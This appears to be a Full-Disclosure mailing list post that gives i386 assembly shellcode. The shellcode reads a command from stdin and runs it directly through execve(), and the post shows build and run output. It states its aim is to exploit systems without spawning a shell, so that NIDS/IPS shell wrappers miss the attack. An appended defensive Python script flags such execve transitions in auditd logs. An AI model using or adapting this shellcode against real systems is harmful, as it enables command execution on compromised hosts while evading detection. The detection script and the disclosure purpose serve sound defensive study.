Hello Sirs! We don't need a shell. A shellcode uses system calls, and the shellcode can be the shell.
See the following code:

-------------- noshell.s --------------
# Example of assembly that simulates a shell.
# Without using any shell, it is the shell. :)
# Nash Leon - [EMAIL PROTECTED]
#
# Note: it only takes a filename of 7 bytes.

_start:
        # read(0,buffer,20)
        xorl %ebx, %ebx           # fd 0 (stdin)
        movl $3, %eax             # syscall number 3 = read
        leal -20(%esp),%ecx       # buffer 20 bytes below the stack pointer
        movl $20, %edx
        int $0x80

        # execve(buffer)
        pushl %ecx
        popl %esi                 # esi = buffer
        movl %esi,0x8(%esi)       # argv[0] = buffer
        movb $0x0,0x7(%esi)       # terminate the path after 7 bytes
        movl $0x0,0xc(%esi)       # argv[1] = NULL
        movl $0xb,%eax            # syscall number 11 = execve
        movl %esi,%ebx
        leal 0x8(%esi),%ecx
        #leal 0xc(%esi),%edx
        movl $0x0, %edx           # envp = NULL
        int $0x80

        # exit()
        movl $0x1, %eax
        xorl %ebx, %ebx
        int $0x80
---------------------------------------

This source uses read() and execve() to execute one command from stdin.
This sample is only to demonstrate that it is possible to create a shellcode that executes commands without using a shell (/bin/bash, sh, zsh, tcsh, etc.). It is useful when a NIDS/IPS interacts with a shell wrapper, waiting for a string in the interface, capturing an attack.

In this sample, only 7 bytes are permitted as the path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.s
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048074
$ /noshell
/bin/ls
noshell noshell.o noshell.s

So, Sirs, a shell is not necessary to exploit a system. NIDS/IPS can use a wrapper on the execve() system call for security, but it is still possible to break this resource.

Sorry for my poor English.

Best regards,

Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
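
An added example, not part of the original post: a defender-side check for the point made above, that watching for a shell misses a direct execve(). It scans constructed auditd-style SYSCALL records for an execve whose previous process image is a watched service; the service path `/usr/sbin/exampled`, the watch list and the log lines are assumptions made for illustration.

```python
import re

# Constructed sample records in Linux auditd SYSCALL format (not from the post).
# arch=40000003/syscall=11 is execve on i386; arch=c000003e/syscall=59 on x86_64.
# On a successful execve, exe= names the new image running in that pid.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1100000000.100:10): arch=40000003 syscall=11 success=yes exit=0 ppid=1 pid=700 uid=0 comm="exampled" exe="/usr/sbin/exampled"
type=SYSCALL msg=audit(1100000050.200:11): arch=40000003 syscall=11 success=yes exit=0 ppid=650 pid=810 uid=500 comm="ls" exe="/bin/ls"
type=SYSCALL msg=audit(1100000090.300:12): arch=40000003 syscall=11 success=yes exit=0 ppid=1 pid=700 uid=0 comm="ls" exe="/bin/ls"
type=SYSCALL msg=audit(1100000095.400:13): arch=40000003 syscall=3 success=yes exit=8 ppid=1 pid=900 uid=0 comm="cat" exe="/bin/cat"
"""

EXECVE = {("40000003", "11"), ("c000003e", "59")}   # (arch, syscall number)
WATCHED = {"/usr/sbin/exampled"}                    # hypothetical network service
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/bin/tcsh"}
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse(line):
    """Turn one audit record into a dict of its key=value fields."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def find_service_execs(log_text):
    """Return alerts for successful execve calls whose previous image is a watched service."""
    image = {}      # pid -> executable currently running in that pid
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec.get("type") != "SYSCALL" or rec.get("success") != "yes":
            continue
        if (rec.get("arch"), rec.get("syscall")) not in EXECVE:
            continue
        pid, ppid, exe = rec["pid"], rec["ppid"], rec["exe"]
        # Same pid re-executing (no fork), or a forked child that inherited the image.
        previous = image.get(pid) or image.get(ppid)
        if previous in WATCHED and exe not in WATCHED:
            alerts.append({"pid": pid, "from": previous, "to": exe,
                           "shell_rule_would_match": exe in SHELLS})
        image[pid] = exe
    return alerts


if __name__ == "__main__":
    for alert in find_service_execs(SAMPLE_LOG):
        print(alert)
```

The third record is the case the post describes: the service's own pid replaces its image with `/bin/ls`, so a rule keyed on shell names stays silent while the image-transition rule fires.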
